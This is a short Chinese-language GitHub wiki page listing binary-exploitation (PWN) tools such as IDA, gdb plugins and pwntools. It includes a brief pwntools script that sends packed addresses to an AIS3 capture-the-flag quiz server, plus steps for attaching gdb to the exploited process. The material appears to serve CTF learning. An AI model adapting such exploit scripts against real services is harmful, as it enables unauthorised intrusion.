PWN 常用工具 - ianchen0119/About-Security GitHub Wiki
pestudio
IDA
- IDA Pro
gdb
- gdb-peda
- .gdbinit
- gef
pwntools
from pwn import *
2 context(arch = 'i386', os = 'linux')
3 r = remote('quiz.ais3.org', 10102)
4 s = r.recvuntil(':')
5 print(s)
6 r.sendline(p32(0x4210728)) # 將 16 進制轉換成 32 bits 的字串
7 s = r.recvuntil(':')
8 print(s)
9 r.sendline(p32(0x4210824)) # 將 16 進制轉換成 32 bits 的字串
10 r.interactive()
連上 GDB
- 在 exploit.py 加上
raw_input()
並執行 - 這時候我們會拿到目標的 Process I'd
- 拿到 pid 以後,打開 GDB 並輸入:
attach your_pid_number